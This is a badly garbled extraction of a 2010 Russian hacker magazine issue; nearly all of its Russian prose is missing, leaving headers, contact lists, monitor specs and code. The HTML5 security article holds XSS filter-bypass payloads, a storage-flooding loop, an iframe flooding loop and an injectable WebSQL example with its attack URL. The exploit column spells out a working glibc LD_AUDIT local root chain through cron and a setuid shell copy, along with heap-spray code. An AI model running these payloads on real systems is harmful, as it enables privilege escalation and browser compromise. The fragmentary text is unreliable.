Вы находитесь на странице: 1из 148

x 12 (143) 2010

.
210
:

DIGITAL FORENSIC: . 34

12 (143) 2010

0day / ,

WINDOWS
. 48

,
?
C. 62

143

HTML5
VIRTUALBOX TIPSNTRICKS
.NET
WIN32.WHISTLER


OBJECTIVE-C

MAC OS X IPHONE
. 96

INTRO

,

$4k .

,
,
.
: ,
,

. , ,
, CMS , 3ds Max ,
/ :).


. :
HDD , Windows 7

1 45 . SSD .
200 /
29 : 4 , !

, ,

. SSD

nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209

-, , :
. SSD upgrade-.
:).

CONTENT
MegaNews

004

076

080

PC_ZONE

086

022

HTML5

090

028

VirtualBox Tips'n'Tricks

032

096

X-!

034

102

.NET

106

110

FERRUM
016

HTTP-


forensic-

038

044

Easy-Hack

048

Windows

054

WFP

058

062

ZDI

066

X-Tools

Trojan-Clicker.Win32.Whistler
-

072

DE

Linux

Mac OS Objective-C

.NET-

QR-

114

120

Master of puppets

126


Windows Server 2008


Puppet

MALWARE
068

:
Linux Mint 9 vs Calculate Linux Desktop 10.9

SYN/ACK

Kernel Pool Overflow

Windows Filtering Platform

, ,

132

MegaFAQ mindFUCK'

140

FAQ UNITED

143

144

WWW2

FAQ

8,5

068

Trojan-Clicker.Win32.Whistler
-

058

Trojan
-Cl

icker.Win32.

096

062

X-!

Mac OS
Objective-C

ZDI

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>

>

>

>PR-

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
>




> MAN TV

(rumyantseva@gameland.ru)
>
( )
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
115 479 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

Mifrill mifrill@real.xakep.ru

MEGANEWS

!
,

, , . , , .
Android- HTC Desire Z
(G2) T-Mobile
, .

.
Android.

, :
,
unionfs.

,
.
, ,

Android. ,
HTC
T-Mobile, , ,
.

$12000 Mozilla 12-


Firefox.
10 .

JPEG,
Google . -,
WebP (.webp), JPEG. ,
, JPEG , , . WebP Google.
, RIFF , VP8 ( Google).
.
, WebP-
. Google, WebP-
39,8% , JPEG,
! , 65%
. 90% JPEG
. ,
Google .
. ,
WebP 8 ,
JPEG.

004

X 12 /143/ 10

MEGANEWS

24
Samsung.
SyncMaster
FX2490HD. 24- LED-
- . ,
, - ,
, , .
MEGA DCR, FullHD- (1080p)
ConnectShare, , , .
, , mp3- USB-
! : 250 /2, 1920x1080, 5 .
FX2490HD: ( , Samsung ). -

. 18 990 .

Ceatec TDK
1 . 16
, 32 .



,
.
-, :
(dolboeb), (mrparker)

(ottenki-serogo),
.
-
,

.
www.digital.ru/digital-university.

.
, Dev-Team ,
Apple A4
bootrom ,

006

iPhone/iPad .
,
iOS 4.1
, . ,
bootrom (read-only),
. Apple, ,
.
Dev-Team .
aka geohot.
PlayStation 3 Apple. ,
-

, Dev-Team,
iOS 4.0
4.1 limera1n. , limera1n
bootrom, .
-, geohot
.
- , geohot
. , Apple
,
! :
, Apple
, geohot,
, Apple
.
X 12 /143/ 10

MEGANEWS

LED LG
LG , E50VR,
: E2250VR E2350VR ( 21.5 23
). LED-
E50: ( 17,5 ), , , Smart+ (Auto Bright, Dual Web, Cinema Mode
Original Ratio). E50VR :
, SUPER+ Resolution.
, . SUPER+ Resolution
, , , ,
. LG , PSP NINTENDO DS ,
( ) .
1920*1080, 250 /2, 5000000:1, 5 .
8200 . E2250VR 8600 . E2350VR.

:
600 000 .


GOOGLE

-,
, .

Google. , Google
Toyota Prius,
. -
140 000 !
, ,
GPS-
, ,
. , , :
,

,
,
. ,
. Google
, ,
,
.
-
, :
-
. Google ,

. ,
.

Internet Explorer .
IE
50%. 2 67%. ,
?



. Hexbug (www.
hexbug.ru), . , , ,
,
( :)),
. , , , , , ,
.
, , Hexbug . ?
, .
AG13. , , .

008

X 12 /143/ 10

MEGANEWS

SDD
CEATEC 2010,
, Hitachi-LG

,
2011 .
HyDrive, , SSD .
Hitachi-LG ,
. HyDrive

32 64 -, ,
256 .
SATA 6 /, Blu-Ray- SATA
USB 3.0.
, ,

, .
, , , .

Microsoft : ,
;
2,2 . , MS,
200 000 .

36


(
)? .
, , ,
.
, Digital
Vote by Mail, 300 .

.

,
, ,
36 ! ,
- ,
,
PDF-.

Hail to the Victors
.
,

.
... ,

. PDF-
.pdf
. ,


GnuPG . ,

.

,
.
,
.
,
- !
, , ,
,
, ,
, .
: $300 000!

GPU


, ,
,

(GPU). , CUDA,

,
, .

010

,
. , GPU
, , ,
. ,
GPU

( -

, ,
). , CUDA
,
x86 (
)

GPU. Malware 2010,
whitepaper (http://bit.ly/
GPUMalware), PoC.
X 12 /143/ 10

11

MEGANEWS

CPP , 40 000
Wi-Fi- 25% , 25%
.

WINDOWS PHONE 7
,
, Microsoft
:).
Windows Mobile
,
. Microsoft ,
WM ,
.
, , Windows Phone 7, ,
. WP7
, . ,
WP7 Windows Embedded CE 6.0,
Microsoft Xbox Live, Zune
Bing. Windows Phone 7 :
,
(Live Tiles). , -,
,
, . (Hubs),
. ,
, , : ,
, , +, Marketplace. : ,

WP7 -
. -! , Microsoft
,
. , - Angry Birds,
iOS Android. -,

.. , . WP7
Tombstoning (push-).
, -
. , .
.
Adobe Flash, ; Silverlight.
, , copy-paste (
iOS). :
HTC, LG, Samsung, Dell Toshiba.
. , , : ( ) 800x480 320x480,
1 , 256 8 -, DirectX 9, GPS-, ,
, FM-, 5 .

TeleGeography : 2010
- 62%.

BLACKBERRY
BlackBerry-
, , .
RIM BlackBerry
,

. RIM
BlackBerry ... , ,
Elcomsoft
BlackBerry,
, .
BlackBerry Desktop Software,
256- AES. , , ,

012

,
, ,
, , SMS-,
. Elcomsoft
Elcomsoft Phone Password
Breaker,
Apple
iPhone iPod Touch.
BlackBerry. , ,
BlackBerry (
) ,
,
.
, RIM
:).
X 12 /143/ 10

?
!
, ,
, .
: ,
- Microsoft. , , , (15
9 146 ). ,
53 .
? ,
. ,
, . , . -

-. , ,
. , ,
upload .

,



(
Ubuntu
Windows). .
: ,
- .
, ,
. , ,
.

PandaLabs ,
57 000 URL-.

MEGANEWS

ENLARGE YOUR PENIS:


MICROSOFT

.
Canadian Health & Care Mall,
, ,
,

Microsoft. ,
,
, , Canadian
Health & Care Mall.

1025
, seizemed.com,
yourrulers.com crashcoursecomputing.com,
,
Microsoft
(DIG ,
131.107.202.197 131.107.202.198).
DNS-, ,
.
Microsoft .
,

, ,
.
, ,

.

HD-
, , .
, , -

,
.
, (
), -

,
. , , ,
. AMIMON,
,
(81,3x29,9x15,5 )
AMIMON WHDI (Wireless Home Digital
Interface) Stick. ,

1080p 60 ,
1 !

WHDI Stick /
.
HDMI-
USB. ,
, , WHDI
. AMIMON

. ,
WHDI Stick , .

Net Applications
Windows XP, 60,03%.
: Windows 7 17,1%, Apple Mac OS X 5,03%, Apple iOS 1,18%
Linux 0,85%.

X 09 /140/ 10

015

FERRUM

ACER B233HU
BENQ V2220
LG E2350V
SAMSUNG BX2240 LED


20 . ?
, ,
.
,
.

.
, ,
. ,
. TN, MVA IPS.
,
. - TN.
? . , . ,
, , . , - , . , ,
, ,
. , , , ,
. TN-
, (
) .
, ,
. .
TN-, ,
IPS. , , ,
.

016

IPS- -,
24- RGB-.
, , , 178.
, 180 , . IPS,
TN, ,
. ,
.
MVA PVA.
, .
.
4 TN-:
, ,
, .
: .


.
.

.
. , .
, .
X 12 /143/ 10

5800 .

9890 .

Acer
B233HU

BenQ
V2220H

: 23"
: TN
: 16:9
: 2048X1152
: 300 /2
: 80000:1
: 5
(./.): 160/160 (CR?10)
: D-SUB, DVI, HDMI, USB
: 2 1
: 544X385X234
: 7,8

: 21,5"
: TN (LED-)
: 16:9
: 1920X1080
: 250 /2
: 10000000:1
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI, HDMI
: : 523X394X171
: 3,3

,
Acer B233HU . ,
-, ,
,
(
, -). ,
;
, . , Acer B233HU
, FullHD 2048x1152 .
: D-Sub,
DVI, HDMI USB-.

BenQ V2220H ,
.
, , .
:
, LED-.
,
. ,
. ,
, , ,
BenQ V2220H .

, Acer B233HU ,
. -,
, . -,
.

, .
, (
VGA), .

X 12 /143/ 10

017

FERRUM

7950 .

6900 .

Samsung
BX2240 LED

LG
E2350V

: 21.5"
: TN (LED-)
: 16:9
: 19201080
: 250 /2
: MEGA DCR (1000:1 )
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI
: : 513X341X190
: 4,2

: 23"
: TN (LED-)
: 16:9
: 1920X1080
: 250 /2
: 5000000:1
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI
: : 560X428X198
: 3,3

. , ,
. ,
,
.
LED-,
. , , , , , .

, . .

018

- ,
, . , LG E2350V, . .
,
, LED- .
: , ,
,

.

LG E2350V
. . -,
, , . -, , .
X 12 /143/ 10

FERRUM

LG E2350V

Samsung BX2240 LED

BenQ V2220

Acer B233HU

LG E2350V,
, -

020

. ,
, BENQ V2220H

. z

X 12 /143/ 10

PC_ZONE
oxdef oxdef.info; Invent

HTML
5

HTM
L5

HTML5:


HTML5 .
,
-.
, ,
.
HTML5,
,
. , ,
, . ,
,
.

HTML5:

HTML5,
, . ,
, . <video>

022

, , , Adobe Flash. HTML5, . , , Youtube Vimeo,


. Apple,
Flash , , ,
. , <video> , .
, HTML5, :
- : -,
;
Canvas 2D API;
X 12 /143/ 10

HTM
L5

Chromium ( Google Chrome)


,
HTML5

(Cross Domain Messaging);


Drag-and-drop-;
-;
(Geolocation).

PDF- HTML5
DVD-. , ,
.

, -
(, , Gmail) -.
- .
Google Google
Gears. ( 4 )
.
, , .
WebStorage. , HTML5
(, ) - JavaScript:
localStorage ;
sessionStorage .
-:
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50.
-
-.
<p> <span
id="count">- </span> .</p>
<script>
if (!localStorage.pageLoadCount)
localStorage.pageLoadCount = 0;
localStorage.pageLoadCount += 1;
document.getElementById('count').textContent =
localStorage.pageLoadCount;
</script>

.
JS, API HTML5 HTML5 Origin,

(, http://example.com:80).
, - 4
5 .
Firefox, Safari, Opera, Google Chrome 5 , IE 10 .
X 12 /143/ 10

Cross Domain Messaging

, , .
, Firefox .example.com. ,
( !) , :
// Firefox 3.6.8
for (var i = 0; i < 100; i++) {
try {
localStorage.setItem(rand(1, 10000).
toString() +
'foo'+i.toString(), 'AA...AA'+i.
toString());
}
catch (e) {
alert(i.toString()+'|'+e);break;
}
}

null-. -
null- localStorage
Firefox. , 1 , -
. , .
. Google Chrome , .
Google Chrome **
, wildcard, 5 !
<script>
for(var i=0; i<10; i++) {
var iframe = document.createElement('iframe');
iframe.src = 'http://'+randomString()+'.example.
com/ddos.html';
document.body.appendChild(iframe);
}
</script>

. , , :
- ;
- DNS- .
- (++)
, example.
com/~user/, , , . ,
, !
-

023

PC_ZONE

HTM
L5


RFC

, HTTP. -
JS API. ,
- -, XSS.
, ,
5 ! , ,
JavaScript
HTTPOnly, . WebStorage , .

SQL- -

,
-SQL- !
SQLite, !
, , ID:
function showById() {
var pos = document.URL.indexOf("book=")+5;
var bookId = document.URL.substring(pos,document.
URL.length);
var author = '';
var title = '';
db.transaction(function(tx) {
tx.executeSql("SELECT * FROM books WHERE id = "
+ bookId, [],
function(tx, result){
if ( result.rows.length > 0) {
document.getElementById('bookAuthor').
textContent = result.rows.item(0)['author'];
document.getElementById('bookTitle').
textContent = result.rows.item(0)['title'];
}
}, function(tx, error){});
});
}

, ?
http://target.com/html5/websql.html?book=1/**/
AND/**/1=2

024

Chromium

DOMXSS+SQL-! , (, Oxod
SQLite, WWW-).
, Opera, Chrome
SQLite- . ,
SQL-. , . , -SQL-
, localStorage sessionStorage.

: IDS WAF

HTML5 , ,
/ WAF (
-
][ 10.2009). autofocus. ,
JavaScript . , HTML5, ,
.
:
<input onfocus=alert(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>

, ,
. <video>, ,
X 12 /143/ 10

HTML
5

HTTP://WWW
links


JavaScript- ( :)) poster:
<video poster=javascript:alert(1)//
<video><source
onerror="javascript:alert(1)">

<video>
-.
Metasploit Decloak (www.decloak.net).
c .
, , JavaScript
onscroll- <BODY>
autofocus?
<body onscroll=alert(1)><br><br><br>...<br><
input autofocus>

, ,
:
<form id="test" /><button form="test" formac
tion="javascript:alert(1)">X

, HTML5
-

: datetime, datetime-local, date,
month, time, week, number, range, email, url, search, tel,
color.
. , date ,
JavaScript.
-. , X 12 /143/ 10


.
<style>
[required] {
background-color: green;
}
:invalid {
background-color: red;
}
</style>

<input name="email" type="email"/>

, ,
!
,
RFC ( , ,
pattern) JavaScript
. ,
! , ,
,
. -, ,
.
AJAX- . :
,
!

C
HTML5:
www.html5rocks.com

HTML:
dev.w3.org/html5/
spec
HTML5 Security
Cheatsheet:
heideri.ch/jso
HTML 5 Security
by Frank Ruske:
www.slideshare.net/
mayflowergmbh/
html-5-security
Dive into HTML5
by Mark Pilgrim:
diveintohtml5.org
,
:
SQLite
Oxod:
www.xakep.ru/
post/53551/default.
asp

WARNING

info
.

,

.

Cross-document messaging

- ( )
-,

025

HTML
5

PC_ZONE

. , ,
. , . ( )
, ,
Firefox, Google Chrome.
, . (,
) example.com/index.html
foo.com/iframe.html, .
foo.com .
foo.com:
<div id="msg">...</div><script>
window.addEventListener('message', receiver, false);
function receiver(e) {
if (e.origin != 'http://example.com') {
return;
}
document.getElementById('msg').innerHTML =
'Origin: ' + e.origin + ' From: ' + e.source +
' Data: ' + e.data;
}
</script>

(e.origin).

, ,
, XSS. ( ) a.example.com
:
<script>
function postMsg() {
var o = document.getElementById('ifra');
o.contentWindow.postMessage(document.
getElementById('msg').value, 'http://foo.com/');
return false;
}</script>


targetOrigin. , *
. IMHO, .
, .
.
,
DOM-based XSS.


(), .
Security and privacy considerations W3.

026

, , .

navigator.geolocation:

if (navigator.geolocation) {
navigator.geolocation.getCurrentPosition(function(p
osition) {
var lat = position.coords.latitude;
var lng = position.coords.longitude;
var options = {position: new google.maps.
LatLng(lat, lng) }
var marker = new google.maps.Marker(options);
marker.setMap(map);
});
}

( MS Internet Explorer,
Geolocation API ) , ,
.
/
. , ,

- IP-,
, , (,
, Google,
),
(www.mozilla.com/ru/firefox/geolocation). ,
-, , (Google Chrome, Firefox,
Opera)?! , Google Location Services! , , , :
Mozilla, Google
Google Location Services
.
- , ! :)
, XSS .

,
- HTML5,
Security . ,
,
W3AF, -.
,
WebStorage
.
,
HTML5 :).z
X 12 /143/ 10

PC_ZONE
Step www.twitter.com/stepah

VirtualBox
Tips'n'Tricks



Linux VirtualBox,
, .
,
.
,
. .
VirtualBox ,
. , ,
, , :
. API, ,
, ,
. VirtualBox,
.

1.
RDP

, .
,
VirtualBox
, RDP (Remode Desktop
Protocol). :
mstsc , , FreeRDP (www.freerdp.com).

028

,
,

. , ,
IP- .
mstsc.
rdesktop,
:
rdesktop host_system_ip:port. RDP

.
3389 ( ,
RDP ),
3390 .. ,
. .

,
. .
X 12 /143/ 10

VirtualBox'

RDP-

, , RPD-
RC4 128-
, 4096 .

RDP-. phpVirtualBox, , RDP Web Control . -


,
. !

2. -

,
.
, ,
( ) ,
RDP . ,
HTTP , . - -
VirtualBox Web Console
(code.google.com/p/vboxweb).
,
phpVirtualBox (code.google.com/p/phpvirtualbox). ,
VirtualBox,
PHP AJAX. , ,
, phpVirtualBox
. .
1. phpVirtualBox
vboxwebsrv ( VirtualBox).
, , /usr/bin.
VirtualBox, , ,
C:\Program Files\Oracle\VirtualBox. : , VirtualBox.
,
.
"C:\Program Files\Oracle\VirtualBox\vboxwebsrv.exe"
>nul

2. - PHP. , XAMP XAMPPLite (www.apachefriends.org).


phpVirtualBox htdocs.
3.
VirtualBox config.php, $username, $password, $location.
. (http://<ip-
>:<>) , .
VirtualBox SDK , RDP-,
Flash. RDP Web Control
,
X 12 /143/ 10

3. !

,
. . , VirtualBox
GUI-.
VBoxManage.exe
. VBoxManage list vms
, UUID:
Oracle VM VirtualBox Command Line Management
Interface Version 3.2.10
(C) 2005-2010 Oracle Corporation
All rights reserved.
"MacOS" {5f74df26-8f93-4f18-b120-da107a5e0a9c}
"macox" {8385d552-b41e-4ffd-add0-3b8795e53f46}
"ubuntu" {09e0b578-3668-4492-92d2-7fa5fb21c911}
"vista" {27b526c2-6bca-4cfe-ace8-703b803670a8}
"xp" {521f3a25-68c7-44e7-a28f-0c60ee87295e}

? :
,
VBoxManage.exe startvm xp.
, ,
. , GUI-,

VBoxManage. SDK ,
VirtualBox
. API
.
, : ( )
Java, Python .
SDK vboxshell.py, API
.
,
, ISO-

029

PC_ZONE

- phpVirtualBox AJAX

CD/DVD-,
..
, API VirtualBox. -
(, )
API VMware . API
VirtualBox ,
VMware.

, VirtualBox .
, P2V (Physical-to-Virtual).
Linux, Windows
. ,
. , , ,

BSOD. .
VirtualBox P2V-, . , :
1. MergeIDE
(http://bit.ly/Merge_IDE). - Windows , IDE/ATA- , , ( ,
, ). ,
, ,
BAT- MergeIDE.
2. .
. LiveCD
. dd.
3. VDI-,
VirtualBox. VBoxManage:

4.

VirtualBox ,
. .
: VirtualBox Host-Only Ethernet
Adapter , . ,
, . ,
pcap-. ,

( , ),
VirtualBox,
,
. :

VBoxManage convertfromraw ImageFile.dd OutputFile.vdi


VBoxManage modifyvm [your-vm] --nictrace[adapternumber] on --nictracefile[adapter-number] file.pcap
VirtualBox -startvm [your-vm]

, :
VBoxManage modifyvm "ubuntu" --nictrace1 on
--nictracefile1 file.pcap
VirtualBox -startvm "ubuntu"

file.pcap ,
, , Wireshark.
,
pcap- (
- ).

5. Windows-

030

, VirtualBox
( <Ctrl+D>).
4.
:).
VDI-.
IO
APIC.
5. . :
, BSOD.
, Guest Editions .
6. Windows. , ,
repair.
.

6. DualBoot

, ?
X 12 /143/ 10

MergeIDE

VirtualBox


,
.
? ! ,
,
. VirtualBox
raw hard disk access
,
. , , :). ,
. , raw hard disk access?
( ,
)
VMDK.
, ,
. :
,
.
:
VBoxManage internalcommands createrawvmdk
-filename /path/to/file.vmdk -rawdisk \\.\
PhysicalDrive0 -register

. , , , , /dev/sda.
,
.

. VMDK- :
VBoxManage storageattach WindowsXP
--storagectl "IDE Controller" --port 0
--device 0 --type hdd --medium /path/to/
file.vmdk
X 12 /143/ 10

,
.
.
, ,
.
VirtualBox: Windows XP (http://
bit.ly/dualbox_xp) Windows 7 (http://bit.ly/dualboot_w7).
.

7. Wi-Fi

,
Linux, -
Wi-Fi-. ,
,
.
,
aircrack kismeta,
, . , ,
VirtualBox
USB- . ,
$20 USB Wi-Fi- (
) ,
, . ,
/
(
Windows). USB,
.

USB . ,
.
Backtrack aircrack , . - Linux.
. VirtualBox,
, .
Portable- www.vbox.
me.z

INFO

info
,
Mac OS X,


MacOS X + VirtualBox
=
][ 08.2010. PDF .

DVD
dvd

VirtualBox,

DVD-.

031

PC_ZONE
Step twitter.com/stepah


HTTP-
Chaos
Construction
.
, Wi-Fi- HTTP-.
- Twitter ,
. HTTP session hijacking .
,
,
-. . ,
,

. ,
,
, -,
,
? , , :
,
. ?
HTTP - .
WifiZoo. Python
Scapy
.
,
,
HTTP-. -.

Linux, Python
Kismet. ,
.
,

HTTP-, Hamster
Sidejacking Tool sessionthief.
. -
,
cookie .
,

.
,
,

032

.

,
.
Firefox Firesheep
(codebutler.com/firesheep) security- Toorcon 12.
,

Start Capturing. -
,
Firesheep , .
, .
,
Firesheep, . .
,
, ,
.
-, .

! ,
. , ,
( Websites).

JS-, ,

,
.

,
Twitter, Dropbox, Google,
,
.


, .

: ?. : HTTPS-!
, , Gmail.
, . .
Firefox
ForceTLS, HTTPS,
. HTTPS Everywhere
,
HTTPS
.
VPN-
Tor,
,
.
, WPA2,

, . z

session highjacking

X 12 /143/ 10

PC_ZONE


forensic-
? ,
, .
,
.
digital forensic,
, ,
, ,
.. ?
forensic . ,
,
- . ,
forensic
. ,
. , .
.

.
- ,

034

. ,
A4 ,
,
, , ,

. .
SSL-
- . Documents and Settings\
user\Local Settings\History\ Documents and Settings\user\Local
Settings\Temporary Internet Files.
. Chrome ChromeAnalysis
(forensic-software.co.uk/chromeanalysis.aspx). X 12 /143/ 10

Web Historian

Google Chrome

, , , , , .. , ,
.
Firefox FoxAnalysis
(forensic-software.co.uk/foxanalysis.aspx). ,
Firefox, , . Web Historian (www.mandiant.com),
Firefox 2/3+, Chrome 3+, Safari 3+ Internet
Explorer 8 . ,
, . ,
(, PDF). Website Analyzer Website Profiler. history-,
, . Website
Profiler , : ,
, , , ..
SQLite- , .

.
,
, . ( )
, ,
. Digital Detective (www.digitaldetective.co.uk) ,
,
( crash-, ),
,
, ..
HstEx ( ) ,

, ! ( ).
- , , HstEx
.

forensic-
. (
raw disk image) dd, .
X 12 /143/ 10

EnCase
forensic


The Sleuth Kit ( ). ,
,

. TSK , , , ,
, ,
, . TSK , . , TSK
,
. FAT, NTFS, Ext2/3, UFS,
, , NTFS.
,
.
TSK .
,
, .
Autopsy Forensic Browser The Sleuth. GUI-
TSK,

035

PC_ZONE

Forencis Toolkit

GUI- TSK
, .. PTK (ptk.dflabs.com/ru/index.
php). , . ,
.
MySQL-, . MySQL : PTK
- AJAX-.

, , ,
( ), .
, , Safeback
(forensics-intl.com/safeback.html).
, (
SCSI-). ,
-, , ,
. forensic The Forensic Toolkit Imager (FTK Imager).
,
.
P2 eXplorer (www.paraben.com/p2-explorer-pro.html).

,
. ,
forensic- .
, ,
.
: EnCase, SafeBackm, WinImage
Linux DD, VMware
VirtualPC.
(,
, ),
.
.
R-Studio (www.r-studio.com), -

036

.
, , Scalpel (www.digitalforensicssolutions.
com/Scalpel). ,
.

. FATx, NTFS, ext2/3,
(raw) .

-
. -
forensic- Encase.
, ,
.
FastBlok,

. Encase (LEF
E01) ,
forensic- (
P2 eXplorer).

, .
, , , ( Outlook) , Encase, .
,
GREP. EnScript
. ,

.
Encase - . ;
Forencis Toolkit (www.
accessdata.com). FTK
. Encase
.
,
, FTK xls-
.
,
. PST-
Outlook FTK ,
X 12 /143/ 10

WinTaylor
LiveCD
, , ,
. ,
.
: cc, tan, pass.

-,
,
live- .
,
Windows- ,
. ,
,
,
WinTaylor (www.caine-live.net).
ActiveX-, ,
, ,
Windows Forensic Toolches Nigilan 32,

WinTaylor.
.
, - ? USBDeview,
.
Memoryze WinTaylor,
.
, , .
, .
Memoryze: ,
( DLL, EXE, ),
,
(
, ..).
, LiveCD-,
forensic-,
Linux. CAINE (Computer Aided
INvestigative Environment)
.
Orion Live CD (sourceforge.net/
projects/orionlivecd).

X 12 /143/ 10

Forensic

, Forensic

.
, , , .
, .
The Cellebrite
UFED Physical Pro ( Mobile Phone
Examiner), 3000
, GPS-.
? .
, SMS .
forensic-

, , SIM- , ,
. ,

, UFED ,
Android iPhone.
,
hex-. z

HTTP://WWW
links

digital
forensic:
blogs.sans.org/
computer-forensics

DVD
dvd


forensic. ,



.

037


, Digital Security a.sintsov@dsec.ru

01


LINUX

CVE

CVE-2010-3856
CVE-2010-3847
TARGETS

Fedora 13
Red Hat 5
CentOS 5
Ubuntu 8/9/10
Debian 5
BRIEF


Microsoft, , , ,
. GNU LIBC,

Linux.
- (Tavis Ormandy)
,
setuid-. . ,
(4 ), , ,
,
stuid-.
, , ,
,
.

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/
cron.d/exploit" ping

, . libpcprofile.so ,
. libc,
root. LD_AUDIT
ld.so setuid- ping.
libpcprofile.so. , ld.so
dlopen(), ,
PCPROFILE_OUTPUT, ,
-. ,
exploit /etc/cron.d.
. ping setuid-,
exploit ...
, umask(0)
rw-rw-rw; ,
, .
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod
u+s /tmp/exploit\n" > \
/etc/cron.d/exploit


setuid.
.
.
$ /tmp/exploit
# whoami
root

EXPLOIT

,
(CVE-2010-3856), Ubuntu, :).
, ; ,
: exploit-db.com/
exploits/15274/. , ,
*nix-.
$ umask 0

.
0, ,
rw-rw-rw-, rwxrwxrwx.
.

038

SOLUTION

Linux- OpenWall,
, , ,
. , , ,
Debian Ubuntu ; ,
.

02

.NET

CVE

CVE-2010-3332
X 12 /143/ 10

Ubuntu

, .NET, .
. , - viewstate,
.
.NET ,
DotNetNuke. CMS
.
EXPLOIT

Tavis Ormandy Google Security Team


TARGETS

Microsoft .NET Framework 1.1-4.0


BRIEF

Microsoft.
.NET Framework. Ekoparty 2010 (Thai Duong)
(Juliano Rizzo), , ,
X 12 /143/ 10

,
,
. (),
.NET WebResource.
axd ScriptResource.axd. d
.
, , , , HTTP-. ,
, , . ,
,
. , , ,
.
, ;
(3DES/AES), ( ) 8
16 . 8 16 (
), .
+--------------------------------+
| C| h| y| p| h| e| r| t| e| x| t|
+--------------------------------+
|01|02|03|04|05|06|07|08|09|10|11|
+--------------------------------+

039

DIR. rscL- , EAX

C(0)
P(i)
P(i)
P(i)

8 .
+-----------------------+-----------------------+
|
BLOCK 1
| BLOCK 2
|
+-----------------------+-----------------------+
| C| h| y| p| h| e| r| t| e| x| t|05|05|05|05|05|
+-----------------------+-----------------------+
|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|
+-----------------------+-----------------------+

8 ,
. .

. CBC.
IV -
C(0) = IV
C(i) = E( P(i) xor C(i-1) )

(0), .
, .

. :
IV

040

=
=
=
=

IV
D( C(i) ) xor C(i-1)
P(i) xor C(i-1) xor C(i-1)
P(i)

, , ,
(30
). , ,
.
CBC-R. XOR
, . ASP .NET
web.config ( ).
-,
.
, IV,
XOR IV , .
CBC-. , : gdssecurity.
com/l/b/2010/09/14/automated-padding-oracle-attacks-withpadbuster/. , ,
: POET, padBuster.pl ..
SOLUTION

Microsoft .
. , 500
.
,
:).

03


ADOBE SHOCKWAVE

CVE

N/A
X 12 /143/ 10

Adobe Shockwave.

TARGETS

Shockwave Player 11.5.8.612


BRIEF

- Abysssec 0day
Adobe Shockwave. , . , , , Flash Acrobat
Reader, . ,
, .
EXPLOIT

DIR. RIFF -. \x57\x46\x49\x52 XFIR .


; ,
, . : tSAC, pami,rcsL.
rcsL-.
, Shockwave .
, rcsL-
EAX, :
X 12 /143/ 10

Adobe Shockwave.

0x68122A42
mov
eax, [esp+18h+arg_4]
; EAX DIR
0x68122A42
mov
edx, [esi+28]
0x68122A42
mov
[esi+0A4], eax
0x68122A42
mov
dword ptr [esi+20], 80000001
0x68122A42
mov
ecx, [edx]
0x68122A42
lea
eax, [eax+eax*2]
; ,

041

Stuxnet :). ESET

0x68122A42
push
esi
0x68122A42
call
dword ptr [ecx+eax*8+20]
;

, ,
HeapSpray. ,
ecx+eax*8+20 NOP-
(HeapSpray , ). call
, NOP- NOP, .
NOP-
0x0A0A0A0A. CALL
, 0x0A0A or
"cl, dword ptr [edx]".
.
SOLUTION

0day
Adobe Shockwave.

04

CVE

CVE-2010-2729
TARGETS

Windows XP
Windows 2003
Windows 2008
Windows 7
BRIEF
Stuxnet 0day. ,
, .
Windows,
.

:
typedef struct _DOC_INFO_1 {
wchar_t* pDocName;
wchat_t* pOutputFile;
wchar_t* pDatatype;
} DOC_INFO_1

( ),
pOutputFile.
, ,
,
.exe .
.exe- :
DWORD RpcWritePrinter(
[in] PRINTER_HANDLE hPrinter,
[in] BYTE* pBuf,
[in] DWORD cbBuf,
[out] DWORD* pcWritten

,
.exe-
(%SystemRoot%\system32). , .exe-.
Metasploit
(HD Moore) NetrJobAdd,
system32
. . , , Metasploit.
SOLUTION

Microsoft (
0day, Stuxnet,
). , .z

EXPLOIT

,
,
.
( ),
.
RPC. RpcStartDocPrinter,
, - :
DWORD RpcStartDocPrinter(
[in] PRINTER_HANDLE hPrinter;
[in] DOC_INFO_CONTAINER* pDocInfoContainer;
[out] DWORD* pJobId
);

042
42

STUXNET
,
Windows.
, Confliker. 0day. LNK-
, ,
ESET (eset.com/
resources/white-papers/Stuxnet_Under_the_Microscope.pdf).
- win32.sys . ,
SCADA Siemens, .
X 12 /143/ 10


GreenDog agrrrdog@gmail.com)

Easy Hack
1

:
WINDOWS

:
, client-side- , .
, , , , , Windows.
, PSI Secunia (secunia.com/vulnerability_scanning/
personal/).

. ,
, .
, , ActiveX.
Secunia : , ( ). :

: HEAPSPRAY
INTERNET EXPLORER 8

:
, Explorer 8,
.
, ,
. ,
, NOP .
, . 100%
, 0x0d0d0d0d,
, , NOP-sled,
. , ,
JavaScript-:
//Shellcode :
var shell = unescape("-_");
//NOP:
var bigbk=unescape("%u9090%u9090%u9090%u9090");
while(bigbk.length<0x50000) bigbk=bigbk+bigbk;


. :
, .

var mem=new Array();


for(i=0; i<400;i++) {mem[i]=bigbk+shell;}

